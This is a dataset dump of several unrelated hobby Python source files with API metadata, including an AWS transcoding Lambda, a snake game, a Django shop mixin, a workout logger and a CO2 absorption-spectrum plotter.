[{"api_name": "random.choice", "line_number": 70, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 136, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 180, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 182, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 184, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 186, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 192, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 192, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 204, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 204, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 208, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 210, "usage_type": "call"}, {"api_name": "pygame.control", "line_number": 216, "usage_type": "call"}, {"api_name": "pygame.control", "line_number": 220, "usage_type": "call"}, {"api_name": "pygame.control", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.control", "line_number": 228, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 246, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 246, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 248, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 248, "usage_type": "attribute"}]}
+{"seq_id": "17753981861", "text": "import os\r\nimport boto3\r\nimport urllib\r\n\r\n\r\n\r\ndef lambda_handler(event, context):\r\n \r\n transcoder = boto3.client('elastictranscoder', 'us-east-1')\r\n #pipeline_id = get_pipeline(transcoder, 'Audio Files')\r\n pipeline_id = '1542792399420-5itz1q'\r\n \r\n \r\n base_filename_ext = os.path.basename(event['Records'][0]['s3']['object']['key'])\r\n \r\n dir_name = os.path.dirname((event['Records'][0]['s3']['object']['key']))\r\n listPath = dir_name.split(\"/\")\r\n \r\n base_filename_space = base_filename_ext.replace(\"+\", \" \")\r\n base_filename_nospace = base_filename_ext.replace(\"+\", \"-\")\r\n \r\n #(dir_name,base_filename1) = os.path.split((event['Records'][0]['s3']['object']['key']))\r\n #base_filename = os.path.splitext(event['Records'][0]['s3']['object']['key'])[0]\r\n base_filename = os.path.splitext(base_filename_nospace)[0]\r\n \r\n if 'appvideo' in listPath :\r\n \r\n job = transcoder.create_job(\r\n PipelineId=pipeline_id,\r\n Input={\r\n 'Key': create_aws_filename(dir_name, base_filename_space, '') ,\r\n 'FrameRate': 'auto',\r\n 'Resolution': 'auto',\r\n 'AspectRatio': 'auto',\r\n 'Interlaced': 'auto',\r\n 'Container' : 'auto',\r\n },\r\n Outputs=[\r\n {\r\n 'Key': create_aws_filename( dir_name , 'thrash'+ base_filename, '.mp3'),\r\n 'PresetId': '1539263753954-rco815',\r\n #'SegmentDuration': '1',\r\n 'ThumbnailPattern': '' + dir_name +'/'+ base_filename + '/Thumbnail_' + base_filename + '-{resolution}' + '-{count}',\r\n },\r\n {\r\n 'Key': create_aws_filename( dir_name +'/'+ base_filename , '480_' + base_filename, '.mp4'),\r\n 'PresetId': '1351620000001-000020'\r\n #Generic 480p \r\n },\r\n #{\r\n #'Key': create_aws_filename(dir_name +'/'+ base_filename, '360_' + base_filename, '.mp4'),\r\n #'PresetId': '1351620000001-000040'\r\n #Generic 360p \r\n #},\r\n {\r\n 'Key': create_aws_filename( dir_name +'/'+ base_filename, '240_' + base_filename, '.mp4'),\r\n 'PresetId': '1539243908519-gd0pkr'\r\n #Generic 240p \r\n } \r\n ]\r\n )\r\n \r\n job_id = job['Job']['Id']\r\n waiter = transcoder.get_waiter('job_complete')\r\n waiter.wait(Id=job_id)\r\n \r\n bucket = 'uploadinput'\r\n key = create_aws_filename(dir_name, base_filename_space, '')\r\n s34 = boto3.client('s3')\r\n s34.delete_object(Bucket=bucket, Key=key)\r\n #bucket = s3.Bucket('uploadinput')\r\n #s3 = boto3.resouce('s3')\r\n #s3.Object(bucket.name,key).delete()\r\n \r\n\r\n \r\n return job \r\n ", "repo_name": "ritesshguptaa/SampleCode", "sub_path": "awsLambda.py", "file_name": "awsLambda.py", "file_ext": "py", "file_size_in_byte": 2632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "boto3.client", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "27152223165", "text": "import time, re\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\n\r\n\r\n\r\n#URL = ''\r\nURL = input('input your youtube playlist URL: ')\r\ndriver = webdriver.Chrome()\r\ndriver.get(URL)\r\ntime.sleep(2)\r\nday, hour, minuate, second = 0, 0, 0, 0\r\ntime_re = re.compile('([0-9]*):([0-9]*)')\r\nsoup = BeautifulSoup(driver.page_source, 'html.parser')\r\nAllvideos = soup.findAll('span', {'class':'style-scope ytd-thumbnail-overlay-time-status-renderer'})\r\nfor i in Allvideos:\r\n minuate += int(time_re.search(i.string.strip()).group(1))\r\n second += int(time_re.search(i.string.strip()).group(2))\r\n\r\nminuate += second//60\r\nsecond = second%60\r\nhour += minuate//60\r\nminuate = minuate%60\r\nday += hour//24\r\nhour = hour%24\r\n\r\nprint('total length of playlist videos is {}d {}h {}m {}s.'.format(day, hour, minuate, second))\r\n", "repo_name": "gusfhr777/youtube_time_checker", "sub_path": "time_checker.py", "file_name": "time_checker.py", "file_ext": "py", "file_size_in_byte": 817, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 9, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 11, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 13, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "3811921684", "text": "import requests\nimport datetime as dt\nimport os\n\nnow = dt.datetime.today()\ndate = now.date()\nDATETIME = date.strftime('%d/%m/%Y')\nNOWTIME = now.strftime('%X')\n\nNUTRITIONIX_API_ID = os.environ.get('NUTRITIONIX_API_ID')\nNUTRITION_API_KEY = os.environ.get('NUTRITION_API_KEY')\nSHEETY_BASIC = os.environ.get('SHEETY_BASIC')\nLOGNAME = os.environ.get('LOGNAME')\nPASSWORD = os.environ.get('SHEETY_PASS')\n\nurl = \"https://trackapi.nutritionix.com/v2/natural/exercise\"\n\nSHEET_API = os.environ.get('SHEET_ENDPOINT')\n\n\nheaders = {\n \"x-app-id\": NUTRITIONIX_API_ID,\n \"x-app-key\": NUTRITION_API_KEY,\n \"Content-Type\": \"application/json\"\n}\n\n# 適当な設定\nparams = {\n \"query\": input(\"Tell me which exercises you did: \"),\n \"gender\": \"male\",\n \"weight_kg\": 80.0,\n \"age\": 28\n}\nresponse = requests.post(url=url, json=params, headers=headers).json()\n\n\nfor exercise in response[\"exercises\"]:\n sheet_input = {\n \"workout\": {\n \"date\": DATETIME,\n \"time\": NOWTIME,\n \"exercise\": exercise[\"name\"].title(),\n \"duration\": exercise[\"duration_min\"],\n \"calories\": exercise[\"nf_calories\"]\n }\n }\n\n\nsheet_post = {\n \"email\": {\n \"name\": \"トムちゃん\",\n \"email\": os.environ.get(\"GOOGLE_EMAIL\"),\n }\n}\n\nbasic = f\"Basic {SHEETY_BASIC}\"\n\nauth = (LOGNAME, PASSWORD)\n\n\npost_sheet = requests.post(\n url=SHEET_API, json=sheet_input, auth=auth)\n\nprint(post_sheet.text)\n", "repo_name": "tomuyamukun/python_3", "sub_path": "Workout_tracking/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1443, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "datetime.datetime.today", "line_number": 5, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 13, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 18, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 34, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 52, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 61, "usage_type": "call"}]}
+{"seq_id": "71329314651", "text": "from django.views import View\n\nfrom mainapp.models import Profile\nfrom order.models import Basket\n\n\nclass BasketMixin(View):\n\n def dispatch(self, request, *args, **kwargs):\n if request.user.is_authenticated:\n profile = Profile.objects.filter(user=request.user).first()\n if not profile:\n profile = Profile.objects.create(\n user=request.user\n )\n basket = Basket.objects.filter(owner=profile, in_order=False).first()\n if not basket:\n basket = Basket.objects.create(owner=profile)\n else:\n basket = Basket.objects.filter(for_anonymous_user=True).first()\n if not basket:\n basket = Basket.objects.create(for_anonymous_user=True)\n\n self.basket = basket\n return super().dispatch(request, *args, **kwargs)\n", "repo_name": "Ireal-ai/Django_Shop", "sub_path": "shopDjango/order/mixins.py", "file_name": "mixins.py", "file_ext": "py", "file_size_in_byte": 872, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.views.View", "line_number": 7, "usage_type": "name"}, {"api_name": "mainapp.models.Profile.objects.filter", "line_number": 11, "usage_type": "call"}, {"api_name": "mainapp.models.Profile.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "mainapp.models.Profile", "line_number": 11, "usage_type": "name"}, {"api_name": "mainapp.models.Profile.objects.create", "line_number": 13, "usage_type": "call"}, {"api_name": "mainapp.models.Profile.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "mainapp.models.Profile", "line_number": 13, "usage_type": "name"}, {"api_name": "order.models.Basket.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "order.models.Basket.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "order.models.Basket", "line_number": 16, "usage_type": "name"}, {"api_name": "order.models.Basket.objects.create", "line_number": 18, "usage_type": "call"}, {"api_name": "order.models.Basket.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "order.models.Basket", "line_number": 18, "usage_type": "name"}, {"api_name": "order.models.Basket.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "order.models.Basket.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "order.models.Basket", "line_number": 20, "usage_type": "name"}, {"api_name": "order.models.Basket.objects.create", "line_number": 22, "usage_type": "call"}, {"api_name": "order.models.Basket.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "order.models.Basket", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "35927958181", "text": "import random\nimport os\nfrom pynput.keyboard import Controller,Key,Listener\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\n\nclass Sanke:\n def __init__(self, currentHeadOrientation, snakeLeng, width, height):\n lcs = locals()\n lcs.pop('self')\n self.__dict__.update(lcs)\n self.bodyList = [[0]*2]*snakeLeng\n self.snakeLeng = snakeLeng\n # 蛇的爬行方向\n self.orientation = []\n self.width = width\n self.height = height\n self.snakeBody = \"*\" # 数组被填充字符串\n self.snakeHead = \"@\" # 蛇头填充\n self.fruitPoint = [0]*2 # 果实位置\n self.fruitStr = \"O\" # 果实填充\n\n \n # 蛇向前爬行\n def wriggle(self):\n # if self.currentHeadOrientation == \"up\":\n # print(\"向上爬\")\n # if self.currentHeadOrientation == \"down\":\n # print(\"向下爬\")\n # if self.currentHeadOrientation == \"left\":\n # print(\"向左爬\")\n # if self.currentHeadOrientation == \"right\":\n # print(\"向右爬\")\n self.generatesFruit()\n self.addSnakeBody()\n self.updateLocation()\n self.updateSite()\n \n # 增加蛇身长度\n def addSnakeBody(self):\n snake_copy = self.bodyList.copy()\n for i in range(len(snake_copy)):\n if i == 0:\n if self.currentHeadOrientation == \"up\":\n self.bodyList[i] = [snake_copy[i][0]-1, snake_copy[i][1]]\n if self.currentHeadOrientation == \"down\":\n self.bodyList[i] = [snake_copy[i][0]+1, snake_copy[i][1]]\n if self.currentHeadOrientation == \"left\":\n self.bodyList[i] = [snake_copy[i][0], snake_copy[i][1]-1]\n if self.currentHeadOrientation == \"right\":\n self.bodyList[i] = [snake_copy[i][0], snake_copy[i][1]+1]\n if self.bodyList[i] == self.fruitPoint:\n # print(\"*-*-*-**-\")\n self.bodyList.append(self.bodyList[-1])\n self.fruitPoint = [0]*2\n continue\n self.bodyList[i] = snake_copy[i-1]\n \n # 更换蛇头朝向\n def changeOrientation(self, type = None):\n self.orientation = [0]*3\n first_x = self.bodyList[0][1]\n first_y = self.bodyList[0][0]\n second_x = self.bodyList[1][1]\n second_y = self.bodyList[1][0]\n if first_y == second_y:\n self.orientation[0] = \"up\"\n self.orientation[1] = \"down\"\n if first_x > second_x :\n self.orientation[2] = \"right\"\n else:\n self.orientation[2] = \"left\"\n \n if first_x == second_x:\n self.orientation[0] = \"left\"\n self.orientation[1] = \"right\"\n if first_y > second_y :\n self.orientation[2] = \"down\"\n else:\n self.orientation[2] = \"up\"\n\n # print(\"当前可操作:\", self.orientation)\n\n if type != None:\n if type in self.orientation:\n self.currentHeadOrientation = type\n else:\n print(\"此方向爬不动哦\")\n return False\n else:\n self.currentHeadOrientation = self.orientation[random.randint(0, len(self.orientation)-1)]\n # print(\"当前朝向\", self.currentHeadOrientation)\n return True\n \n # 更新蛇的位置\n def updateLocation(self):\n for i in range(height):\n site[i] = [0]*width\n for j in range(width):\n site[i][j] = defaultBody\n if self.fruitPoint[0] + self.fruitPoint[1] > 0:\n site[self.fruitPoint[0]][self.fruitPoint[1]] = self.fruitStr\n\n site[self.bodyList[0][0]][self.bodyList[0][1]] = self.snakeHead\n for i in range(len(self.bodyList)-1):\n i = i + 1\n site[self.bodyList[i][0]][self.bodyList[i][1]] = self.snakeBody\n\n # 初始化蛇的位置\n def initSnake(self):\n first_x = random.randint(5, self.width-5)\n first_y = random.randint(5, self.height-5)\n self.bodyList[0] = [first_y, first_x-1]\n site[first_y][first_x-1] = self.snakeHead\n for i in range(self.snakeLeng-1):\n i = i + 1\n first_x = first_x + 1\n first_y = first_y\n self.bodyList[i] = [first_y, first_x-1]\n site[first_y][first_x-1] = self.snakeBody\n self.updateSite()\n self.changeOrientation()\n \n # 随机生成果实\n def generatesFruit(self):\n if self.fruitPoint[0] + self.fruitPoint[1] > 0:\n return\n \n pointList = []\n for i in range(height):\n tmp = []\n for j in range(width):\n tmp = [i, j]\n if tmp in self.bodyList:\n pass\n else:\n pointList.append(tmp)\n\n point = random.randint(0, len(pointList)-1)\n self.fruitPoint = pointList[point]\n print(\"果实位置:\", self.fruitPoint)\n \n\n\n \n # 刷新场地\n def updateSite(self):\n os.system('cls')\n print(\"蛇身长:\", len(self.bodyList))\n arr = []\n for i in range(height):\n arr = [\"-\"]*len(site[i])\n if i <= 0:\n print(\"\".join(arr))\n print( \"|\" + \"\".join(site[i]) + \"|\")\n print(\"\".join(arr))\n # print(\"当前位置:\", self.bodyList)\n \n # 监听释放\n def on_release(self, key):\n if key==Key.up:\n result = self.changeOrientation(\"up\")\n if result == True:\n self.wriggle()\n if key==Key.down:\n result = self.changeOrientation(\"down\")\n if result == True:\n self.wriggle()\n if key==Key.left:\n result = self.changeOrientation(\"left\")\n if result == True:\n self.wriggle()\n if key==Key.right:\n result = self.changeOrientation(\"right\")\n if result == True:\n self.wriggle()\n if key==Key.esc:\n # 停止监听\n return False\n \n\nheight = 29 # 数组个数\nwidth = 60 # 数组长度\nsite = ['0']*height # 场地高度\ndefaultBody = \" \" # 默认数组填充字符串\n\n# 初始化场地\ndef initSite():\n for i in range(height):\n site[i] = [0]*width\n for j in range(width):\n site[i][j] = defaultBody\n\n\n\n\n# 开始监听\ndef start_listen(snake):\n with Listener(on_release=snake.on_release) as listener:\n listener.join()\n\ndef run():\n print(\"----------------------------------------------------------------------------------------------------------\")\n # 创建一条蛇\n snake = Sanke(\"\", 10, width, height)\n \n initSite()\n snake.initSnake()\n\n # 每0.5秒更新蛇爬行 \n scheduler = BackgroundScheduler()\n scheduler.add_job(snake.wriggle, 'interval', seconds=0.5)\n scheduler.start()\n\n # 实例化键盘\n kb=Controller()\n kb.release(\"a\")\n # 开始监听,按esc退出监听\n start_listen(snake)\n \n \n\n \n \n\n\nif __name__ == \"__main__\":\n run()", "repo_name": "xiaoyaos/GluttonousSnake", "sub_path": "snake.py", "file_name": "snake.py", "file_ext": "py", "file_size_in_byte": 6403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "random.randint", "line_number": 91, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 111, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 112, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 139, "usage_type": "call"}, {"api_name": "os.system", "line_number": 148, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key.up", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 161, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.down", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 165, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.left", "line_number": 169, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 169, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.right", "line_number": 173, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 173, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.esc", "line_number": 177, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 177, "usage_type": "name"}, {"api_name": "pynput.keyboard.Listener", "line_number": 199, "usage_type": "call"}, {"api_name": "apscheduler.schedulers.background.BackgroundScheduler", "line_number": 211, "usage_type": "call"}, {"api_name": "pynput.keyboard.Controller", "line_number": 216, "usage_type": "call"}]}
+{"seq_id": "7258699377", "text": "import pytest\r\nfrom unittest.mock import patch\r\n\r\n\r\nfrom project import make_url, get_weather, display_forecast_choice\r\n\r\ndef test_make_url(requests_mock):\r\n city = \"New York\"\r\n expected_query = \"http://api.openweathermap.org/data/2.5/forecast?q=New+York&units=metric&appid=4a667b3caefe6915603d5d48f02b50d7\"\r\n requests_mock.get(expected_query, json={})\r\n assert make_url(city) == expected_query\r\n\r\ndef test_get_weather(requests_mock):\r\n city = \"New York\"\r\n expected_response = {}\r\n query_url = make_url(city)\r\n requests_mock.get(query_url, json=expected_response)\r\n assert get_weather(query_url) == expected_response\r\n\r\n@patch('builtins.input', side_effect=['today'])\r\n@patch('sys.exit')\r\ndef test_display_forecast_choice_exit_on_invalid_input(mock_exit, mock_input):\r\n weather_data = {\r\n \"list\": [],\r\n \"city\": {\"name\": \"New York\"}\r\n }\r\n display_forecast_choice(weather_data)\r\n assert mock_exit.called_with(\"Invalid choice. Please enter 'today' or 'tomorrow'.\")\r\n\r\nif __name__ == \"__main__\":\r\n pytest.main()\r\n", "repo_name": "alexbalash/cs50-final-project", "sub_path": "test_project.py", "file_name": "test_project.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "project.make_url", "line_number": 11, "usage_type": "call"}, {"api_name": "project.make_url", "line_number": 16, "usage_type": "call"}, {"api_name": "project.get_weather", "line_number": 18, "usage_type": "call"}, {"api_name": "project.display_forecast_choice", "line_number": 27, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 20, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 21, "usage_type": "call"}, {"api_name": "pytest.main", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "24956018462", "text": "from django.urls import path\n\nfrom . import views\n\napp_name = 'frontend'\nurlpatterns = [\n # path('snails/activity/', views.create_new_activity, name='activity'),\n path('snails/activity/detail/', views.activity_detail, name='activity-detail'),\n path('snails/activity/detail///', views.activity_detail_by_date,\n name='activity-by-date'),\n path('snails/activity/detail/', views.activity_detail_by_pen, name='activity-detail-by-pen'),\n path('snails/activity/summary/', views.activity_summary, name='activity-summary'),\n path('snails/inventory/detail/', views.inventory_detail, name='inventory-detail'),\n path('snails/inventory/detail/', views.inventory_detail_by_pen, name='inventory-detail-by-pen'),\n path('snails/inventory/snapshot/', views.inventory_snapshot, name='inventory-snapshot'),\n path('snails/inventory/snapshot/', views.inventory_snapshot_by_staff, name='inventory-snapshot-staff'),\n path('snails/inventory/snapshot/all', views.inventory_snapshot_all, name='inventory-snapshot-all'),\n path('snails/inventory/specie/', views.inventory_by_specie, name='inventory-specie'),\n path('eggs/inventory/activities', views.eggs_inventory_activities, name='eggs-inventory-activities'),\n path('eggs/inventory/activities/', views.eggs_inventory_by_pen, name='eggs-inventory-by-pen'),\n path('eggs/inventory/snapshot', views.eggs_inventory_snapshot, name='eggs-inventory-snapshot'),\n path('pens/view/', views.pen_data, name='pens'),\n path('graphs/', views.activity_graph, name='graphs')\n]\n# /inventory\n", "repo_name": "waleadekoya/MaidstoneFarmSite", "sub_path": "front_end/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "10581855446", "text": "import numpy\nimport random\nimport pylab\nfrom hapi import *\nimport pandas as pd\nfrom pylab import GridSpec\nfrom matplotlib.widgets import Slider\nfrom pathlib import Path\nimport os\n\ndb_begin('data')\nfetch_by_ids('CO2', [7, 8, 9, 10], 3589.1, 3590.199)\n\ndef first_y(T, P , x, cons):\n '''Отображаемая фукнция'''\n\n n = cons*10132.5/((1.380649e-16)*T)\n\n k = -(absorptionCoefficient_Lorentz(((2,1), (2,2), (2,3), (2,4), ), 'CO2', Environment = {'p': P, 'T':T}, OmegaStep=0.001, GammaL = 'gamma_self', Diluent = {'self':cons, 'air': 1-cons}, HITRAN_units = True)[1])\n\n return 1-numpy.exp(k*n*47)\ndef second_y(T, P , x, cons):\n '''Отображаемая фукнция'''\n\n n = cons*10132.5/((1.380649e-16)*T)\n\n k = -(absorptionCoefficient_Doppler(((2,1), (2,2), (2,3), (2,4), ), 'CO2', Environment = {'p': P, 'T':T}, OmegaStep=0.001, GammaL = 'gamma_self', Diluent = {'self':cons, 'air': 1-cons}, HITRAN_units = True)[1])\n\n return 1-numpy.exp(k*n*47)\n\ndef third_y(T, P , x, cons):\n '''Отображаемая фу��нция'''\n\n n = cons*10132.5/((1.380649e-16)*T)\n\n k = -(absorptionCoefficient_Voigt(((2,1), (2,2), (2,3), (2,4), ), 'CO2', Environment = {'p': P, 'T':T}, OmegaStep=0.001, GammaL = 'gamma_self', Diluent = {'self':cons, 'air': 1-cons}, HITRAN_units = True)[1])\n\n return 1-numpy.exp(k*n*47)\n\nif __name__ == '__main__':\n def slava_merlow():\n\n SRC = Path(os.getcwd()+'/Documents/Github/Dushnila/CO2 absorption coefficient, cm-1.csv')\n #SRC = (Path(os.getcwd()) / 'CO2 absorption coefficient, cm-1.csv')\n return pd.read_csv(SRC, delimiter=';').replace(to_replace=',', value = '.', regex = True).astype('float')\n\n def updateGraph():\n '''!!! Функция для обновления графика'''\n # Будем использовать sigma и mu, установленные с помощью слайдеров\n global slider_T\n global slider_P\n global slider_cons\n global graph_1\n global graph_2\n global graph_3\n global graph_4\n global grid_visible\n global data\n data = slava_merlow()\n\n\n # Используем атрибут val, чтобы получить значение слайдеров\n T = slider_T.val\n P = slider_P.val\n cons = slider_cons.val\n x = absorptionCoefficient_Lorentz(((2,1), (2,2), (2,3), (2,4), ), 'CO2', Environment = {'p': P, 'T':T}, OmegaStep=0.001, GammaL = 'gamma_self', HITRAN_units = True)[0]\n #y = first_y(T, P, x , cons)\n\n\n graph_1.clear()\n graph_1.grid()\n graph_1.plot(x, first_y(T, P, x , cons),data['Wavenumber, cm-1'],data['Lorentz'])\n graph_1.legend(['Lorentz', 'Slava'])\n\n graph_2.clear()\n graph_2.grid()\n graph_2.plot(x, second_y(T, P, x , cons),data['Wavenumber, cm-1'],data['Doppler'])\n graph_2.legend(['Doppler', 'Slava'])\n\n graph_3.clear()\n graph_3.grid()\n graph_3.plot(x, third_y(T, P, x , cons),data['Wavenumber, cm-1'],data['Voigt'])\n graph_3.legend(['Voigt', 'Slava'])\n\n graph_4.clear()\n graph_4.grid()\n graph_4.plot(x, third_y(T, P, x , cons),data['Wavenumber, cm-1'],data['Voigt'])\n graph_4.legend(['Voigt', 'Slava'])\n\n pylab.draw()\n\n def onChangeValue(value):\n '''!!! Обработчик события изменения значений слайдеров'''\n updateGraph()\n\n#YFXFKJ KZNCRJQ GHJUHFVVS\n # Создадим окно с графиком\n\n graph_1 = pylab.subplot2grid((3,2),(0,0))\n graph_2 = pylab.subplot2grid((3,2),(0,1))\n graph_3 = pylab.subplot2grid((3,2),(1,0))\n graph_4 = pylab.subplot2grid((3,2),(1,1))\n\n graph_1.grid()\n graph_2.grid()\n graph_3.grid()\n graph_4.grid()\n\n\n # Создание слайдера для задания T\n axes_slider_T = pylab.axes([0.05, 0.25, 0.85, 0.04])\n slider_T = Slider(axes_slider_T,\n label='T',\n valmin=250,\n valmax=500,\n valinit=296,\n valfmt='%1.2f')\n\n # !!! Подпишемся на событие при изменении значения слайдера.\n slider_T.on_changed(onChangeValue)\n\n # Создание слайдера для задания P\n axes_slider_P = pylab.axes([0.05, 0.17, 0.85, 0.04])\n slider_P = Slider(axes_slider_P,\n label='P',\n valmin=0.001,\n valmax=2,\n valinit=0.01,\n valfmt='%1.4f')\n\n # !!! Подпишемся на событие при изменении значения слайдера.\n slider_P.on_changed(onChangeValue)\n\n# Создание слайдера для задания cons\n axes_slider_cons = pylab.axes([0.05, 0.09, 0.85, 0.04])\n slider_cons = Slider(axes_slider_cons,\n label='cs',\n valmin=0,\n valmax=0.5,\n valinit=0.02,\n valfmt='%1.5f')\n\n# !!! Подпишемся на событие при изменении значения слайдера.\n slider_cons.on_changed(onChangeValue)\n\n\n\n updateGraph()\n\n pylab.show()", "repo_name": "Amba-AlexsmeT/Dushnila", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5360, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.exp", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 38, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 45, "usage_type": "call"}, {"api_name": "pylab.draw", "line_number": 90, "usage_type": "call"}, {"api_name": "pylab.subplot2grid", "line_number": 99, "usage_type": "call"}, {"api_name": "pylab.subplot2grid", "line_number": 100, "usage_type": "call"}, {"api_name": "pylab.subplot2grid", "line_number": 101, "usage_type": "call"}, {"api_name": "pylab.subplot2grid", "line_number": 102, "usage_type": "call"}, {"api_name": "pylab.axes", "line_number": 111, "usage_type": "call"}, {"api_name": 